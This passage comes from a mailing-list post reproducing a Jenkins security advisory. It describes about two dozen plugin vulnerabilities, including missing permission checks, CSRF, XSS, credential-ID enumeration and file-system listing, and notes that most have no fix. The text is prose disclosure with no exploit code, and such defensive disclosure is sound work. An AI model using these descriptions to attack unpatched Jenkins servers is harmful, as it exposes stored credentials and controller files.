permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2629 / CVE-2022-36899
Compuware ISPW Operations Plugin defines a controller/agent message that
retrieves Java system properties.

Compuware ISPW Operations Plugin 1.0.8 and earlier does not restrict
execution of the controller/agent message to agents. This allows attackers
able to control agent processes to retrieve Java system properties.

NOTE: This vulnerability is only exploitable in Jenkins 2.318 and earlier,
LTS 2.303.2 and earlier.


SECURITY-2630 / CVE-2022-36900
Compuware zAdviser API Plugin defines a controller/agent message that
retrieves Java system properties.

Compuware zAdviser API Plugin 1.0.3 and earlier does not restrict execution
of the controller/agent message to agents. This allows attackers able to
control agent processes to retrieve Java system properties.

NOTE: This vulnerability is only exploitable in Jenkins 2.318 and earlier,
LTS 2.303.2 and earlier.


SECURITY-2053 / CVE-2022-36901
HTTP Request Plugin 1.15 and earlier stores HTTP Request passwords
unencrypted in its global configuration file
\`jenkins.plugins.http\_request.HttpRequest.xml\` on the Jenkins controller as
part of its configuration when using (deprecated) Basic/Digest
Authentication.

These passwords can be viewed by users with access to the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2682 / CVE-2022-36902
Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier does not escape
several fields of Moded Extended Choice parameters.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-2665 (1) / CVE-2022-36903
Repository Connector Plugin 2.2.0 and earlier does not perform permission
checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2665 (2) / CVE-2022-36904
Repository Connector Plugin 2.2.0 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2686 / CVE-2022-36905
Maven Metadata Plugin for Jenkins CI server Plugin 2.2 and earlier does not
perform URL validation for the Repository Base URL of List maven artifact
versions parameters.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-1375 (1) / CVE-2022-36906 (CSRF) & CVE-2022-36907 (missing permission check)
OpenShift Deployer Plugin 1.2.0 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL using attacker-specified username and password.

Additionally, this form validation method does not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-1375 (2) / CVE-2022-36908 (CSRF) & CVE-2022-36909 (missing permission check)
OpenShift Deployer Plugin 1.2.0 and earlier does not perform permission
checks in methods implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system and to upload a SSH key file from the Jenkins controller file system
to an attacker-specified URL.

Additionally, these form validation methods do not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2048 / CVE-2022-36910
Lucene-Search Plugin 370.v62a5f618cd3a and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to reindex the database
and to obtain information about jobs otherwise inaccessible to them.

As of publication of this advisory, there is no fix.


SECURITY-2105 (1) / CVE-2022-36911 (CSRF) & CVE-2022-36912 (missing permission check)
Openstack Heat Plugin 1.5 and earlier does not perform permission checks in
methods implementing form validation.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL.

Additionally, these form validation methods do not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2105 (2) / CVE-2022-36913
Openstack Heat Plugin 1.5 and earlier does not perform permission checks in
methods implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2210 / CVE-2022-36914
Files Found Trigger Plugin 1.5 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2404 / CVE-2022-36915
Android Signing Plugin 2.2.5 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.

As of publication of this advisory, there is no fix.


SECURITY-2656 / CVE-2022-36916 (CSRF) & CVE-2022-36917 (missing permission check)
Google Cloud Backup Plugin 0.6 and earlier does not perform a permission
check in an HTTP endpoint.

This allows attackers with Overall/Read permission to request a manual
backup.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2747 / CVE-2022-36918
Buckminster Plugin 1.1.1 and earlier does not perform a permission check in
a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2790 (1) / CVE-2022-36919
Coverity Plugin 1.11.4 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2790 (2) / CVE-2022-36920 (CSRF) & CVE-2022-36921 (permission check)
Coverity Plugin 1.11.4 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL using attacker-specified credentials IDs obtained
through another method, capturing credentials stored in Jenkins.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2812 / CVE-2022-36922
Lucene-Search Plugin 370.v62a5f618cd3a and earlier does not escape the
search \`query\` parameter displayed on the search result page.

This results in a reflected cross-site scripting (XSS) vulnerability.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

Tag

#windows